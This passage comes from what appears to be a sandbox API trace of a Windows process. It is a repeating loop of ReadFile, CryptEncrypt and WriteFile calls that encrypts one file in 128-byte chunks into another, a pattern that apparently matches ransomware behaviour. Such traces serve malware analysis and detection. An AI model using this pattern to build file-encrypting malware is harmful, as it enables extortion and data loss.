hKey=0x29ff10, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2869c8*, pdwDataLen=0x12f110*=0x80, dwBufLen=0x100 | out: pbData=0x2869c8*, pdwDataLen=0x12f110*=0x80) returned 1 [0045.488] WriteFile (in: hFile=0xc4, lpBuffer=0x2869c8*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x12f110, lpOverlapped=0x0 | out: lpBuffer=0x2869c8*, lpNumberOfBytesWritten=0x12f110*=0x80, lpOverlapped=0x0) returned 1 [0045.488] ReadFile (in: hFile=0xb8, lpBuffer=0x2869c8, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x12f110, lpOverlapped=0x0 | out: lpBuffer=0x2869c8*, lpNumberOfBytesRead=0x12f110*=0x80, lpOverlapped=0x0) returned 1 [0045.488] CryptEncrypt (in: hKey=0x29ff10, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2869c8*, pdwDataLen=0x12f110*=0x80, dwBufLen=0x100 | out: pbData=0x2869c8*, pdwDataLen=0x12f110*=0x80) returned 1 [0045.488] WriteFile (in: hFile=0xc4, lpBuffer=0x2869c8*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x12f110, lpOverlapped=0x0 | out: lpBuffer=0x2869c8*, lpNumberOfBytesWritten=0x12f110*=0x80, lpOverlapped=0x0) returned 1 [0045.489] ReadFile (in: hFile=0xb8, lpBuffer=0x2869c8, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x12f110, lpOverlapped=0x0 | out: lpBuffer=0x2869c8*, lpNumberOfBytesRead=0x12f110*=0x80, lpOverlapped=0x0) returned 1 [0045.489] CryptEncrypt (in: hKey=0x29ff10, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2869c8*, pdwDataLen=0x12f110*=0x80, dwBufLen=0x100 | out: pbData=0x2869c8*, pdwDataLen=0x12f110*=0x80) returned 1 [0045.489] WriteFile (in: hFile=0xc4, lpBuffer=0x2869c8*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x12f110, lpOverlapped=0x0 | out: lpBuffer=0x2869c8*, lpNumberOfBytesWritten=0x12f110*=0x80, lpOverlapped=0x0) returned 1 [0045.489] ReadFile (in: hFile=0xb8, lpBuffer=0x2869c8, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x12f110, lpOverlapped=0x0 | out: lpBuffer=0x2869c8*, lpNumberOfBytesRead=0x12f110*=0x80, lpOverlapped=0x0) returned 1 [0045.489] CryptEncrypt (in: hKey=0x29ff10, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2869c8*, pdwDataLen=0x12f110*=0x80, dwBufLen=0x100 | out: pbData=0x2869c8*, pdwDataLen=0x12f110*=0x80) returned 1 [0045.489] WriteFile (in: hFile=0xc4, lpBuffer=0x2869c8*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x12f110, lpOverlapped=0x0 | out: lpBuffer=0x2869c8*, lpNumberOfBytesWritten=0x12f110*=0x80, lpOverlapped=0x0) returned 1 [0045.489] ReadFile (in: hFile=0xb8, lpBuffer=0x2869c8, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x12f110, lpOverlapped=0x0 | out: lpBuffer=0x2869c8*, lpNumberOfBytesRead=0x12f110*=0x80, lpOverlapped=0x0) returned 1 [0045.489] CryptEncrypt (in: hKey=0x29ff10, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2869c8*, pdwDataLen=0x12f110*=0x80, dwBufLen=0x100 | out: pbData=0x2869c8*, pdwDataLen=0x12f110*=0x80) returned 1 [0045.489] WriteFile (in: hFile=0xc4, lpBuffer=0x2869c8*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x12f110, lpOverlapped=0x0 | out: lpBuffer=0x2869c8*, lpNumberOfBytesWritten=0x12f110*=0x80, lpOverlapped=0x0) returned 1 [0045.489] ReadFile (in: hFile=0xb8, lpBuffer=0x2869c8, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x12f110, lpOverlapped=0x0 | out: lpBuffer=0x2869c8*, lpNumberOfBytesRead=0x12f110*=0x80, lpOverlapped=0x0) returned 1 [0045.489] CryptEncrypt (in: hKey=0x29ff10, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2869c8*, pdwDataLen=0x12f110*=0x80, dwBufLen=0x100 | out: pbData=0x2869c8*, pdwDataLen=0x12f110*=0x80) returned 1 [0045.489] WriteFile (in: hFile=0xc4, lpBuffer=0x2869c8*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x12f110, lpOverlapped=0x0 | out: lpBuffer=0x2869c8*, lpNumberOfBytesWritten=0x12f110*=0x80, lpOverlapped=0x0) returned 1 [0045.489] ReadFile (in: hFile=0xb8, lpBuffer=0x2869c8, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x12f110, lpOverlapped=0x0 | out: lpBuffer=0x2869c8*, lpNumberOfBytesRead=0x12f110*=0x80, lpOverlapped=0x0) returned 1 [0045.489] CryptEncrypt (in: hKey=0x29ff10, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2869c8*, pdwDataLen=0x12f110*=0x80, dwBufLen=0x100 | out: pbData=0x2869c8*, pdwDataLen=0x12f110*=0x80) returned 1 [0045.489] WriteFile (in: hFile=0xc4, lpBuffer=0x2869c8*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x12f110, lpOverlapped=0x0 | out: lpBuffer=0x2869c8*, lpNumberOfBytesWritten=0x12f110*=0x80, lpOverlapped=0x0) returned 1 [0045.489] ReadFile (in: hFile=0xb8, lpBuffer=0x2869c8, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x12f110, lpOverlapped=0x0 | out: lpBuffer=0x2869c8*, lpNumberOfBytesRead=0x12f110*=0x80, lpOverlapped=0x0) returned 1 [0045.490] CryptEncrypt (in: hKey=0x29ff10, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2869c8*, pdwDataLen=0x12f110*=0x80, dwBufLen=0x100 | out: pbData=0x2869c8*, pdwDataLen=0x12f110*=0x80) returned 1 [0045.490] WriteFile (in: hFile=0xc4, lpBuffer=0x2869c8*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x12f110, lpOverlapped=0x0 | out: lpBuffer=0x2869c8*, lpNumberOfBytesWritten=0x12f110*=0x80, lpOverlapped=0x0) returned 1 [0045.490] ReadFile (in: hFile=0xb8, lpBuffer=0x2869c8, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x12f110, lpOverlapped=0x0 | out: lpBuffer=0x2869c8*, lpNumberOfBytesRead=0x12f110*=0x80, lpOverlapped=0x0) returned 1 [0045.490] CryptEncrypt (in: hKey=0x29ff10, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2869c8*, pdwDataLen=0x12f110*=0x80, dwBufLen=0x100 | out: pbData=0x2869c8*, pdwDataLen=0x12f110*=0x80) returned 1 [0045.490] WriteFile (in: hFile=0xc4, lpBuffer=0x2869c8*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x12f110, lpOverlapped=0x0 | out: lpBuffer=0x2869c8*, lpNumberOfBytesWritten=0x12f110*=0x80, lpOverlapped=0x0) returned 1 [0045.490] ReadFile (in: hFile=0xb8, lpBuffer=0x2869c8, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x12f110, lpOverlapped=0x0 | out: lpBuffer=0x2869c8*, lpNumberOfBytesRead=0x12f110*=0x80, lpOverlapped=0x0) returned 1 [0045.490] CryptEncrypt (in: hKey=0x29ff10, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2869c8*, pdwDataLen=0x12f110*=0x80, dwBufLen=0x100 | out: pbData=0x2869c8*, pdwDataLen=0x12f110*=0x80) returned 1 [0045.490] WriteFile (in: hFile=0xc4, lpBuffer=0x2869c8*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x12f110, lpOverlapped=0x0 | out: lpBuffer=0x2869c8*, lpNumberOfBytesWritten=0x12f110*=0x80, lpOverlapped=0x0) returned 1 [0045.490] ReadFile (in: hFile=0xb8, lpBuffer=0x2869c8, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x12f110, lpOverlapped=0x0 | out: lpBuffer=0x2869c8*, lpNumberOfBytesRead=0x12f110*=0x80, lpOverlapped=0x0) returned 1 [0045.490] CryptEncrypt (in: hKey=0x29ff10, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2869c8*, pdwDataLen=0x12f110*=0x80, dwBufLen=0x100 | out: pbData=0x2869c8*, pdwDataLen=0x12f110*=0x80) returned 1 [0045.490] WriteFile (in: hFile=0xc4, lpBuffer=0x2869c8*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x12f110, lpOverlapped=0x0 | out: lpBuffer=0x2869c8*, lpNumberOfBytesWritten=0x12f110*=0x80, lpOverlapped=0x0) returned 1 [0045.490] ReadFile (in: hFile=0xb8, lpBuffer=0x2869c8, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x12f110, lpOverlapped=0x0 | out: lpBuffer=0x2869c8*, lpNumberOfBytesRead=0x12f110*=0x80, lpOverlapped=0x0) returned 1 [0045.490] CryptEncrypt (in: hKey=0x29ff10, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2869c8*, pdwDataLen=0x12f110*=0x80, dwBufLen=0x100 | out: pbData=0x2869c8*, pdwDataLen=0x12f110*=0x80) returned 1 [0045.490] WriteFile (in: hFile=0xc4, lpBuffer=0x2869c8*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x12f110, lpOverlapped=0x0 | out: lpBuffer=0x2869c8*, lpNumberOfBytesWritten=0x12f110*=0x80, lpOverlapped=0x0) returned 1 [0045.490] ReadFile (in: hFile=0xb8, lpBuffer=0x2869c8, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x12f110, lpOverlapped=0x0 | out: lpBuffer=0x2869c8*, lpNumberOfBytesRead=0x12f110*=0x80, lpOverlapped=0x0) returned 1 [0045.490] CryptEncrypt (in: hKey=0x29ff10, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2869c8*, pdwDataLen=0x12f110*=0x80, dwBufLen=0x100 | out: pbData=0x2869c8*, pdwDataLen=0x12f110*=0x80) returned 1 [0045.491] WriteFile (in: hFile=0xc4, lpBuffer=0x2869c8*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x12f110, lpOverlapped=0x0 | out: lpBuffer=0x2869c8*, lpNumberOfBytesWritten=0x12f110*=0x80, lpOverlapped=0x0) returned 1 [0045.491] ReadFile (in: hFile=0xb8, lpBuffer=0x2869c8, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x12f110, lpOverlapped=0x0 | out: lpBuffer=0x2869c8*, lpNumberOfBytesRead=0x12f110*=0x80, lpOverlapped=0x0) returned 1 [0045.491] CryptEncrypt (in: hKey=0x29ff10, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2869c8*, pdwDataLen=0x12f110*=0x80, dwBufLen=0x100 | out: pbData=0x2869c8*, pdwDataLen=0x12f110*=0x80) returned 1 [0045.491] WriteFile (in: hFile=0xc4, lpBuffer=0x2869c8*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x12f110, lpOverlapped=0x0 | out: lpBuffer=0x2869c8*, lpNumberOfBytesWritten=0x12f110*=0x80, lpOverlapped=0x0) returned 1 [0045.491] ReadFile (in: hFile=0xb8, lpBuffer=0x2869c8, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x12f110, lpOverlapped=0x0 | out: lpBuffer=0x2869c8*, lpNumberOfBytesRead=0x12f110*=0x80, lpOverlapped=0x0) returned 1 [0045.491] CryptEncrypt (in: hKey=0x29ff10, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2869c8*, pdwDataLen=0x12f110*=0x80, dwBufLen=0x100 | out: pbData=0x2869c8*, pdwDataLen=0x12f110*=0x80) returned 1 [0045.491] WriteFile (in: hFile=0xc4, lpBuffer=0x2869c8*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x12f110, lpOverlapped=0x0 | out: lpBuffer=0x2869c8*, lpNumberOfBytesWritten=0x12f110*=0x80, lpOverlapped=0x0) returned 1 [0045.491] ReadFile (in: hFile=0xb8, lpBuffer=0x2869c8, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x12f110, lpOverlapped=0x0 | out: lpBuffer=0x2869c8*, lpNumberOfBytesRead=0x12f110*=0x80, lpOverlapped=0x0) returned 1 [0045.491] CryptEncrypt (in: hKey=0x29ff10, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2869c8*, pdwDataLen=0x12f110*=0x80, dwBufLen=0x100 | out: pbData=0x2869c8*, pdwDataLen=0x12f110*=0x80) returned 1 [0045.491] WriteFile (in: hFile=0xc4, lpBuffer=0x2869c8*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x12f110, lpOverlapped=0x0 | out: lpBuffer=0x2869c8*, lpNumberOfBytesWritten=0x12f110*=0x80, lpOverlapped=0x0) returned 1 [0045.491] ReadFile (in: hFile=0xb8, lpBuffer=0x2869c8, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x12f110, lpOverlapped=0x0 | out: lpBuffer=0x2869c8*, lpNumberOfBytesRead=0x12f110*=0x80, lpOverlapped=0x0) returned 1 [0045.491] CryptEncrypt (in: hKey=0x29ff10, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2869c8*, pdwDataLen=0x12f110*=0x80, dwBufLen=0x100 | out: pbData=0x2869c8*, pdwDataLen=0x12f110*=0x80) returned 1 [0045.491] WriteFile (in: hFile=0xc4, lpBuffer=0x2869c8*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x12f110, lpOverlapped=0x0 | out: lpBuffer=0x2869c8*, lpNumberOfBytesWritten=0x12f110*=0x80, lpOverlapped=0x0) returned 1 [0045.491] ReadFile (in: hFile=0xb8, lpBuffer=0x2869c8, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x12f110, lpOverlapped=0x0 | out: lpBuffer=0x2869c8*, lpNumberOfBytesRead=0x12f110*=0x80, lpOverlapped=0x0) returned 1 [0045.491] CryptEncrypt (in: hKey=0x29ff10, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2869c8*, pdwDataLen=0x12f110*=0x80, dwBufLen=0x100 | out: pbData=0x2869c8*, pdwDataLen=0x12f110*=0x80) returned 1 [0045.492] WriteFile (in: hFile=0xc4, lpBuffer=0x2869c8*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x12f110, lpOverlapped=0x0 | out: lpBuffer=0x2869c8*, lpNumberOfBytesWritten=0x12f110*=0x80, lpOverlapped=0x0) returned 1 [0045.492] ReadFile (in: hFile=0xb8, lpBuffer=0x2869c8, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x12f110, lpOverlapped=0x0 | out: lpBuffer=0x2869c8*, lpNumberOfBytesRead=0x12f110*=0x80, lpOverlapped=0x0) returned 1 [0045.492] CryptEncrypt (in: hKey=0x29ff10, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2869c8*, pdwDataLen=0x12f110*=0x80, dwBufLen=0x100 | out: pbData=0x2869c8*, pdwDataLen=0x12f110*=0x80) returned 1 [0045.492] WriteFile (in: hFile=0xc4, lpBuffer=0x2869c8*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x12f110, lpOverlapped=0x0 | out: lpBuffer=0x2869c8*, lpNumberOfBytesWritten=0x12f110*=0x80, lpOverlapped=0x0) returned 1 [0045.492] ReadFile (in: hFile=0xb8, lpBuffer=0x2869c8, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x12f110, lpOverlapped=0x0 | out: lpBuffer=0x2869c8*, lpNumberOfBytesRead=0x12f110*=0x80, lpOverlapped=0x0) returned 1 [0045.492] CryptEncrypt (in: hKey=0x29ff10, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2869c8*, pdwDataLen=0x12f110*=0x80, dwBufLen=0x100 | out: pbData=0x2869c8*, pdwDataLen=0x12f110*=0x80) returned 1 [0045.492] WriteFile (in: hFile=0xc4, lpBuffer=0x2869c8*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x12f110, lpOverlapped=0x0 | out: lpBuffer=0x2869c8*, lpNumberOfBytesWritten=0x12f110*=0x80, lpOverlapped=0x0) returned 1 [0045.492] ReadFile (in: hFile=0xb8, lpBuffer=0x2869c8, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x12f110, lpOverlapped=0x0 | out: lpBuffer=0x2869c8*, lpNumberOfBytesRead=0x12f110*=0x80, lpOverlapped=0x0) returned 1 [0045.492] CryptEncrypt (in: hKey=0x29ff10, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2869c8*, pdwDataLen=0x12f110*=0x80, dwBufLen=0x100 | out: pbData=0x2869c8*, pdwDataLen=0x12f110*=0x80) returned 1 [0045.492] WriteFile (in: hFile=0xc4, lpBuffer=0x2869c8*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x12f110, lpOverlapped=0x0 | out: lpBuffer=0x2869c8*, lpNumberOfBytesWritten=0x12f110*=0x80, lpOverlapped=0x0) returned 1 [0045.492] ReadFile (in: hFile=0xb8, lpBuffer=0x2869c8, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x12f110, lpOverlapped=0x0 | out: lpBuffer=0x2869c8*, lpNumberOfBytesRead=0x12f110*=0x80, lpOverlapped=0x0) returned 1 [0045.492] CryptEncrypt (in: hKey=0x29ff10, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2869c8*, pdwDataLen=0x12f110*=0x80, dwBufLen=0x100 | out: pbData=0x2869c8*, pdwDataLen=0x12f110*=0x80) returned 1 [0045.492] WriteFile (in: hFile=0xc4, lpBuffer=0x2869c8*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x12f110, lpOverlapped=0x0 | out: lpBuffer=0x2869c8*, lpNumberOfBytesWritten=0x12f110*=0x80, lpOverlapped=0x0) returned 1 [0045.492] ReadFile (in: hFile=0xb8, lpBuffer=0x2869c8, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x12f110, lpOverlapped=0x0 | out: lpBuffer=0x2869c8*, lpNumberOfBytesRead=0x12f110*=0x80, lpOverlapped=0x0) returned 1 [0045.492] CryptEncrypt (in: hKey=0x29ff10, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2869c8*, pdwDataLen=0x12f110*=0x80, dwBufLen=0x100 | out: pbData=0x2869c8*, pdwDataLen=0x12f110*=0x80) returned 1 [0045.492] WriteFile (in: hFile=0xc4, lpBuffer=0x2869c8*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x12f110, lpOverlapped=0x0 | out: lpBuffer=0x2869c8*, lpNumberOfBytesWritten=0x12f110*=0x80, lpOverlapped=0x0) returned 1 [0045.493] ReadFile (in: hFile=0xb8, lpBuffer=0x2869c8, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x12f110, lpOverlapped=0x0 | out: lpBuffer=0x2869c8*, lpNumberOfBytesRead=0x12f110*=0x80, lpOverlapped=0x0) returned 1 [0045.493] CryptEncrypt (in: hKey=0x29ff10, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2869c8*, pdwDataLen=0x12f110*=0x80, dwBufLen=0x100 | out: pbData=0x2869c8*, pdwDataLen=0x12f110*=0x80) returned 1 [0045.493] WriteFile (in: hFile=0xc4, lpBuffer=0x2869c8*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x12f110, lpOverlapped=0x0 | out: lpBuffer=0x2869c8*, lpNumberOfBytesWritten=0x12f110*=0x80, lpOverlapped=0x0) returned 1 [0045.493] ReadFile (in: hFile=0xb8, lpBuffer=0x2869c8, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x12f110, lpOverlapped=0x0 | out: lpBuffer=0x2869c8*, lpNumberOfBytesRead=0x12f110*=0x80, lpOverlapped=0x0) returned 1 [0045.493] CryptEncrypt (in: hKey=0x29ff10, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2869c8*, pdwDataLen=0x12f110*=0x80, dwBufLen=0x100 | out: pbData=0x2869c8*, pdwDataLen=0x12f110*=0x80) returned 1 [0045.493] WriteFile (in: hFile=0xc4, lpBuffer=0x2869c8*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x12f110, lpOverlapped=0x0 | out: lpBuffer=0x2869c8*, lpNumberOfBytesWritten=0x12f110*=0x80, lpOverlapped=0x0) returned 1 [0045.493] ReadFile (in: hFile=0xb8, lpBuffer=0x2869c8, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x12f110, lpOverlapped=0x0 | out: lpBuffer=0x2869c8*, lpNumberOfBytesRead=0x12f110*=0x80, lpOverlapped=0x0) returned 1 [0045.493] CryptEncrypt (in: hKey=0x29ff10, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2869c8*, pdwDataLen=0x12f110*=0x80, dwBufLen=0x100 | out: pbData=0x2869c8*, pdwDataLen=0x12f110*=0x80) returned 1 [0045.493] WriteFile (in: hFile=0xc4, lpBuffer=0x2869c8*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x12f110, lpOverlapped=0x0 | out: lpBuffer=0x2869c8*, lpNumberOfBytesWritten=0x12f110*=0x80, lpOverlapped=0x0) returned 1 [0045.493] ReadFile (in: hFile=0xb8, lpBuffer=0x2869c8, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x12f110, lpOverlapped=0x0 | out: lpBuffer=0x2869c8*, lpNumberOfBytesRead=0x12f110*=0x80, lpOverlapped=0x0) returned 1 [0045.493] CryptEncrypt (in: hKey=0x29ff10, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2869c8*, pdwDataLen=0x12f110*=0x80, dwBufLen=0x100 | out: pbData=0x2869c8*, pdwDataLen=0x12f110*=0x80) returned 1 [0045.493] WriteFile (in: hFile=0xc4, lpBuffer=0x2869c8*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x12f110, lpOverlapped=0x0 | out: lpBuffer=0x2869c8*, lpNumberOfBytesWritten=0x12f110*=0x80, lpOverlapped=0x0) returned 1 [0045.493] ReadFile (in: hFile=0xb8, lpBuffer=0x2869c8, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x12f110, lpOverlapped=0x0 | out: lpBuffer=0x2869c8*, lpNumberOfBytesRead=0x12f110*=0x80, lpOverlapped=0x0) returned 1 [0045.493] CryptEncrypt (in: hKey=0x29ff10, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2869c8*, pdwDataLen=0x12f110*=0x80, dwBufLen=0x100 | out: pbData=0x2869c8*, pdwDataLen=0x12f110*=0x80) returned 1 [0045.493] WriteFile (in: hFile=0xc4, lpBuffer=0x2869c8*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x12f110, lpOverlapped=0x0 | out: lpBuffer=0x2869c8*, lpNumberOfBytesWritten=0x12f110*=0x80, lpOverlapped=0x0) returned 1 [0045.494] ReadFile (in: hFile=0xb8, lpBuffer=0x2869c8, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x12f110, lpOverlapped=0x0 | out: lpBuffer=0x2869c8*, lpNumberOfBytesRead=0x12f110*=0x80, lpOverlapped=0x0) returned 1 [0045.494] CryptEncrypt (in: hKey=0x29ff10, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2869c8*, pdwDataLen=0x12f110*=0x80, dwBufLen=0x100 | out: pbData=0x2869c8*, pdwDataLen=0x12f110*=0x80) returned 1 [0045.494] WriteFile (in: hFile=0xc4, lpBuffer=0x2869c8*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x12f110, lpOverlapped=0x0 | out: lpBuffer=0x2869c8*, lpNumberOfBytesWritten=0x12f110*=0x80, lpOverlapped=0x0) returned 1 [0045.494] ReadFile (in: hFile=0xb8, lpBuffer=0x2869c8, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x12f110, lpOverlapped=0x0 | out: lpBuffer=0x2869c8*, lpNumberOfBytesRead=0x12f110*=0x80, lpOverlapped=0x0) returned 1 [0045.494] CryptEncrypt (in: hKey=0x29ff10, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2869c8*, pdwDataLen=0x12f110*=0x80, dwBufLen=0x100 | out: pbData=0x2869c8*, pdwDataLen=0x12f110*=0x80) returned 1 [0045.494] WriteFile (in: hFile=0xc4, lpBuffer=0x2869c8*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x12f110, lpOverlapped=0x0 | out: lpBuffer=0x2869c8*, lpNumberOfBytesWritten=0x12f110*=0x80, lpOverlapped=0x0) returned 1 [0045.494] ReadFile (in: hFile=0xb8, lpBuffer=0x2869c8, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x12f110, lpOverlapped=0x0 | out: lpBuffer=0x2869c8*, lpNumberOfBytesRead=0x12f110*=0x80, lpOverlapped=0x0) returned 1 [0045.494] CryptEncrypt (in: hKey=0x29ff10, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2869c8*, pdwDataLen=0x12f110*=0x80, dwBufLen=0x100 | out: pbData=0x2869c8*, pdwDataLen=0x12f110*=0x80) returned 1 [0045.494] WriteFile (in: hFile=0xc4, lpBuffer=0x2869c8*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x12f110, lpOverlapped=0x0 | out: lpBuffer=0x2869c8*, lpNumberOfBytesWritten=0x12f110*=0x80, lpOverlapped=0x0) returned 1 [0045.494] ReadFile (in: hFile=0xb8, lpBuffer=0x2869c8, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x12f110, lpOverlapped=0x0 | out: lpBuffer=0x2869c8*, lpNumberOfBytesRead=0x12f110*=0x80, lpOverlapped=0x0) returned 1 [0045.494] CryptEncrypt (in: hKey=0x29ff10, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2869c8*, pdwDataLen=0x12f110*=0x80, dwBufLen=0x100 | out: pbData=0x2869c8*, pdwDataLen=0x12f110*=0x80) returned 1 [0045.494] WriteFile (in: hFile=0xc4, lpBuffer=0x2869c8*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x12f110, lpOverlapped=0x0 | out: lpBuffer=0x2869c8*, lpNumberOfBytesWritten=0x12f110*=0x80, lpOverlapped=0x0) returned 1 [0045.494] ReadFile (in: hFile=0xb8, lpBuffer=0x2869c8, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x12f110, lpOverlapped=0x0 | out: lpBuffer=0x2869c8*, lpNumberOfBytesRead=0x12f110*=0x80, lpOverlapped=0x0) returned 1 [0045.494] CryptEncrypt (in: hKey=0x29ff10, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2869c8*, pdwDataLen=0x12f110*=0x80, dwBufLen=0x100 | out: pbData=0x2869c8*, pdwDataLen=0x12f110*=0x80) returned 1 [0045.494] WriteFile (in: hFile=0xc4, lpBuffer=0x2869c8*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x12f110, lpOverlapped=0x0 | out: lpBuffer=0x2869c8*, lpNumberOfBytesWritten=0x12f110*=0x80, lpOverlapped=0x0) returned 1 [0045.494] ReadFile (in: hFile=0xb8, lpBuffer=0x2869c8, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x12f110, lpOverlapped=0x0 | out: lpBuffer=0x2869c8*, lpNumberOfBytesRead=0x12f110*=0x80, lpOverlapped=0x0) returned 1 [0045.495] CryptEncrypt (in: hKey=0x29ff10, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2869c8*, pdwDataLen=0x12f110*=0x80, dwBufLen=0x100 | out: pbData=0x2869c8*, pdwDataLen=0x12f110*=0x80) returned 1 [0045.495] WriteFile (in: hFile=0xc4, lpBuffer=0x2869c8*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x12f110, lpOverlapped=0x0 | out: lpBuffer=0x2869c8*, lpNumberOfBytesWritten=0x12f110*=0x80, lpOverlapped=0x0) returned 1 [0045.495] ReadFile (in: hFile=0xb8, lpBuffer=0x2869c8, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x12f110, lpOverlapped=0x0 | out: lpBuffer=0x2869c8*, lpNumberOfBytesRead=0x12f110*=0x80, lpOverlapped=0x0) returned 1 [0045.495] CryptEncrypt (in: hKey=0x29ff10, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2869c8*, pdwDataLen=0x12f110*=0x80, dwBufLen=0x100 | out: pbData=0x2869c8*, pdwDataLen=0x12f110*=0x80) returned 1 [0045.495] WriteFile (in: hFile=0xc4, lpBuffer=0x2869c8*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x12f110, lpOverlapped=0x0 | out: lpBuffer=0x2869c8*, lpNumberOfBytesWritten=0x12f110*=0x80, lpOverlapped=0x0) returned 1 [0045.495] ReadFile (in: hFile=0xb8, lpBuffer=0x2869c8, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x12f110, lpOverlapped=0x0 | out: lpBuffer=0x2869c8*, lpNumberOfBytesRead=0x12f110*=0x80, lpOverlapped=0x0) returned 1 [0045.495] CryptEncrypt (in: hKey=0x29ff10, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2869c8*, pdwDataLen=0x12f110*=0x80, dwBufLen=0x100 | out: pbData=0x2869c8*, pdwDataLen=0x12f110*=0x80) returned 1 [0045.495] WriteFile (in: hFile=0xc4, lpBuffer=0x2869c8*, 